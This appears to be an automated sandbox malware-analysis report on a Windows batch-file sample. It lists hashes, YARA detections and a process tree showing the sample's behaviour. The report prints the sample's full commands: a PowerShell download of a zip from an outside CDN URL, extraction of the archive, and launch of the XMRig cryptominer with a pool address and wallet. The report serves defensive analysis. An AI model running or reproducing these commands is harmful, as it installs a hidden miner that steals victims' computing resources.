Overview
overview
10Static
static
1tesy - Copy (10).bat
windows10-2004-x64
10tesy - Copy (11).bat
windows10-2004-x64
10tesy - Copy (12).bat
windows10-2004-x64
10tesy - Copy (13).bat
windows10-2004-x64
10tesy - Copy (14).bat
windows10-2004-x64
10tesy - Copy (2).bat
windows10-2004-x64
10tesy - Copy (3).bat
windows10-2004-x64
10tesy - Copy (4).bat
windows10-2004-x64
10tesy - Copy (5).bat
windows10-2004-x64
10tesy - Copy (6).bat
windows10-2004-x64
10tesy - Copy (7).bat
windows10-2004-x64
10tesy - Copy (8).bat
windows10-2004-x64
10tesy - Copy (9).bat
windows10-2004-x64
10tesy - Copy.bat
windows10-2004-x64
10tesy.bat
windows10-2004-x64
10Analysis
-
max time kernel
1796s -
max time network
1789s -
platform
windows10-2004_x64 -
resource
win10v2004-20231025-en -
resource tags
arch:x64arch:x86image:win10v2004-20231025-enlocale:en-usos:windows10-2004-x64system -
submitted
29-10-2023 01:05
Static task
static1
Behavioral task
behavioral1
Sample
tesy - Copy (10).bat
Resource
win10v2004-20231025-en
Behavioral task
behavioral2
Sample
tesy - Copy (11).bat
Resource
win10v2004-20231025-en
Behavioral task
behavioral3
Sample
tesy - Copy (12).bat
Resource
win10v2004-20231023-en
Behavioral task
behavioral4
Sample
tesy - Copy (13).bat
Resource
win10v2004-20231023-en
Behavioral task
behavioral5
Sample
tesy - Copy (14).bat
Resource
win10v2004-20231025-en
Behavioral task
behavioral6
Sample
tesy - Copy (2).bat
Resource
win10v2004-20231023-en
Behavioral task
behavioral7
Sample
tesy - Copy (3).bat
Resource
win10v2004-20231023-en
Behavioral task
behavioral8
Sample
tesy - Copy (4).bat
Resource
win10v2004-20231023-en
Behavioral task
behavioral9
Sample
tesy - Copy (5).bat
Resource
win10v2004-20231023-en
Behavioral task
behavioral10
Sample
tesy - Copy (6).bat
Resource
win10v2004-20231025-en
Behavioral task
behavioral11
Sample
tesy - Copy (7).bat
Resource
win10v2004-20231020-en
Behavioral task
behavioral12
Sample
tesy - Copy (8).bat
Resource
win10v2004-20231023-en
Behavioral task
behavioral13
Sample
tesy - Copy (9).bat
Resource
win10v2004-20231020-en
Behavioral task
behavioral14
Sample
tesy - Copy.bat
Resource
win10v2004-20231020-en
General
-
Target
tesy - Copy (11).bat
-
Size
706B
-
MD5
035f17438f6146d5ac7285b4adfeb370
-
SHA1
ef83c877367e96073e2b9b841d9c03ece6b1df7e
-
SHA256
02261a07ff83d906a835ac5229b25595239717e0091f2462804d0a31859bbdc0
-
SHA512
49455c7edd51537ba92e2db0941f571cd6ad89252702a19cf5910b390b182c16fc970ca62c26582b293ac5fc096e84538c5634472ab6e31bbd29242e8bb816cf
Malware Config
Extracted
https://cdn.nest.rip/uploads/fe8c3030-34d2-4153-bdb3-f0ef0fdd51b2.zip
Signatures
-
XMRig Miner payload 64 IoCs
resource yara_rule behavioral2/files/0x0006000000022e1e-45.dat family_xmrig behavioral2/files/0x0006000000022e1e-45.dat xmrig behavioral2/memory/4732-48-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-51-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-54-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-55-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-56-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-57-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-58-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-59-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-60-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-61-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-62-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-63-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-64-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-65-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-66-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-67-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-68-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-69-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-70-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-71-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-72-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-73-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-74-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-75-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-76-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-77-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-78-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-79-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-80-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-81-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-82-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-83-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-84-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-85-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-86-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-87-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-88-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-89-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-90-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-91-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-92-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-93-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-94-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-95-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-96-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-97-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-98-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-99-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-100-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-101-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-102-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-103-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-104-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-105-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-106-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-107-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-108-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-109-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-110-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-111-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-112-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig behavioral2/memory/4732-113-0x00007FF7E9E70000-0x00007FF7EA973000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
flow pid Process 7 464 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4732 xmrig.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 464 powershell.exe 464 powershell.exe 2344 powershell.exe 2344 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 676 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 464 powershell.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeLockMemoryPrivilege 4732 xmrig.exe Token: SeLockMemoryPrivilege 4732 xmrig.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4732 xmrig.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2376 wrote to memory of 464 2376 cmd.exe 88 PID 2376 wrote to memory of 464 2376 cmd.exe 88 PID 2376 wrote to memory of 2344 2376 cmd.exe 90 PID 2376 wrote to memory of 2344 2376 cmd.exe 90 PID 2376 wrote to memory of 3740 2376 cmd.exe 95 PID 2376 wrote to memory of 3740 2376 cmd.exe 95 PID 3740 wrote to memory of 4732 3740 cmd.exe 97 PID 3740 wrote to memory of 4732 3740 cmd.exe 97
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy (11).bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.nest.rip/uploads/fe8c3030-34d2-4153-bdb3-f0ef0fdd51b2.zip', 'test1.zip')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Path 'test1.zip' -DestinationPath '.'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K start.cmd2⤵
- Suspicious use of WriteProcessMemory
PID:3740 -
C:\Users\Admin\AppData\Local\Temp\xmrig-6.20.0\xmrig.exexmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b143⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4732
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD56c4805e00673bef922d51b1a7137028f
SHA10eabb38482d1733dd85a2af9c5342c2cafcd41eb
SHA2567af7d25fe7e3bb8b75bcffaa8573e2e9af7e7f70a840fa8bc0196d0ab396ecdd
SHA512eb6dacb4e0da6f45028ebf65ebffdc6aecdb6a34a582bb69aa5836ef02a7115f6b500ef2dd6a2c2be994ec9d0cbbff564368724593666105d3d4475441830cc1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.2MB
MD595452958f42b1b93f0c887f59d84d19f
SHA1c861dc457d57471ab42879f49cc8fe171e7c9b1c
SHA256dc24f4d37898468e34bee09afdcb7e1fc681ecbac667bc8eb3c62d035c0fd255
SHA51296207cb7d6cb2977acfbc5e9f507fe0b1b43a5041e5ea50c63f4f7db620fa14512066781c306ba123b0e6aafbb048c4b042f5fdb21e97a48a536acd783b2e072
-
Filesize
278B
MD5080123b6eac4a332d3f2b11f6eb3aa54
SHA18f3d40eae881e3b871cff2aa85521d727ada2a64
SHA256cd7f2c4251361d8e83bc1857767c6eb20d305605ca78418aca3af439ff7d41e2
SHA5120c5033e8a72a924d360bec1b1304889b23dea6a514cd18b055824c19d440a2875472ba70202efb4b7b636398ebd114b365ce88ca18b88a129588639c26d62d8c
-
Filesize
7.9MB
MD54813fa6d610e180b097eae0ce636d2aa
SHA11e9cd17ea32af1337dd9a664431c809dd8a64d76
SHA2569ef2e8714e85dcd116b709894b43babb4a0872225ae7363152013b7fd1bc95bc
SHA5125463e61b9583dd7e73fc4c0f14252ce06bb1b24637fdf5c4b96b3452cf486b147c980e365ca6633d89e7cfe245131f528a7ecab2340251cef11cdeb49dac36aa